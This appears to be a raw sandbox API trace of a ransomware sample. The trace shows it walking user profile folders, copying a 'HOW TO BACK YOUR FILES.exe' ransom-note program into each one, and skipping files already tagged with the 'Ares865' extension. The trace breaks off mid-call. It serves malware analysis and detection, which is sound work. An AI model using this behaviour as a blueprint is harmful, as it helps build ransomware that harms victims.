[0042.423] lstrlenW (lpString="desktop.ini") returned 11 [0042.423] lstrlenW (lpString="Ares865") returned 7 [0042.423] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.423] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="History.IE5" | out: lpString1="History.IE5") returned="History.IE5" [0042.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0042.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x2cb310 [0042.423] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0042.424] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.424] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.424] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0042.424] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.424] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0042.424] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="Low" | out: lpString1="Low") returned="Low" [0042.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e9eb0 [0042.424] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.424] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0042.424] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.424] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2388 [0042.424] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" [0042.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0042.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.424] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned 65 [0042.424] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low" [0042.424] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.424] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.425] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.425] GetLastError () returned 0x0 [0042.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.425] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.425] CloseHandle (hObject=0x118) returned 1 [0042.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.425] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.425] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.425] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.425] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.425] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0042.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.425] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned 73 [0042.425] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5" [0042.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.426] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.426] GetLastError () returned 0x0 [0042.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.426] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.426] CloseHandle (hObject=0x118) returned 1 [0042.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.427] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.427] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.427] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.427] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.427] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.427] lstrlenW (lpString="desktop.ini") returned 11 [0042.427] lstrlenW (lpString="Ares865") returned 7 [0042.427] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.427] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.427] lstrlenW (lpString="index.dat") returned 9 [0042.427] lstrlenW (lpString="Ares865") returned 7 [0042.427] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.427] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" [0042.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0042.427] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned 70 [0042.427] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data" [0042.427] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.427] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.428] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.428] GetLastError () returned 0x0 [0042.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.428] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.428] CloseHandle (hObject=0x118) returned 1 [0042.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.428] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.428] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.428] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.429] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2d1ea0 [0042.429] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2348 | out: ListHead=0x2e77d0, ListEntry=0x2d2348) returned 0x2d2328 [0042.429] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0042.429] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.429] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0042.429] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="History" | out: lpString1="History") returned="History" [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x2cb310 [0042.429] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0042.429] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.429] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.429] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db.Ares865", cAlternateFileName="ICONCA~1.ARE")) returned 1 [0042.429] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.429] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="aoldtz.exe") returned 1 [0042.429] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="IconCache.db.Ares865" | out: lpString1="IconCache.db.Ares865") returned="IconCache.db.Ares865" [0042.429] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0042.429] lstrlenW (lpString="Ares865") returned 7 [0042.429] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.429] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0042.429] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.429] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0042.429] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2cb3b8 [0042.429] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.429] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0042.429] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.429] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0042.430] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0042.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc0) returned 0x2cba28 [0042.430] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.430] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0042.430] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.430] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0042.430] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0042.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.430] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned 95 [0042.430] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files" [0042.430] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.430] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.430] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.431] GetLastError () returned 0x0 [0042.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.431] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.431] CloseHandle (hObject=0x118) returned 1 [0042.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.431] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.431] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.431] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.431] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.431] lstrcpyW (in: lpString1=0x2e2e920, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0042.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd8) returned 0x2cba28 [0042.431] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.431] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe710360, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.431] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.431] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.431] lstrcpyW (in: lpString1=0x2e2e920, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.431] lstrlenW (lpString="desktop.ini") returned 11 [0042.431] lstrlenW (lpString="Ares865") returned 7 [0042.432] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.432] lstrcpyW (in: lpString1=0x2e2e920, lpString2="Low" | out: lpString1="Low") returned="Low" [0042.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cbb08 [0042.432] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.432] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0042.432] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.432] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0042.432] lstrcpyW (in: lpString1=0x2e2e920, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0042.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd8) returned 0x2cbdb0 [0042.432] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.432] FindNextFileW (in: hFindFile=0x2ccea8, 